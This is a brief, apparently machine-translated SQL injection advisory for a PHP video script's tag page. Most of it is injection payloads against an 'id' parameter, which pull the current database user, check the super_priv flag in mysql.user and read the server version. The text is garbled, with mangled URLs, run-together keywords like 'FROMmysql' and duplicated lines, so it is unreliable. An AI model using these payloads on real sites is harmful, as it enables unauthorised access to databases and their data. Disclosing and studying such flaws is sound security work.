Title: php video script SQL Injection Vulnerability
Author: longrifle0x www.2cto.com www. security-research.ge
: Http://www.alurian.com/php-video-script/
Test Tool: SQLMAP
Overview
SQL injection found in video_tags.
* Test Method *
Link: http://www.bkjia.com/tag
Vulnerability link: http://www.bkjia.com/tag
Http://www.bkjia.com/tag '/index. php? Id = 1
<Http://www.bkjia.com/tag '/index. php? Id = 1> [GET] [id =-1] [CURRENT_USER ()
Http://www.bkjia.com/tag '/index. php? Id = 1 [GET] [id =-1] [SELECT (CASE
<Http://www.bkjia.com/tag '/index. php? Id = 1 [GET] [id =-1] [SELECT (CASE> WHEN
(SELECT super_priv FROMmysql. user WHERE user = 'none' LIMIT 0, 1) = 'y ')
THEN 1 ELSE 0 END)
Http://www.bkjia.com/tag '/index. php? Id = 1 [GET] [id =-1] [MID (VERSION (), 1, 6)
<Http://www.bkjia.com/tag '/index. php? Id = 1 [GET] [id =-1] [MID (VERSION (), 1, 6)>
Www.2cto.com repair
Filter parameter input on the preceding page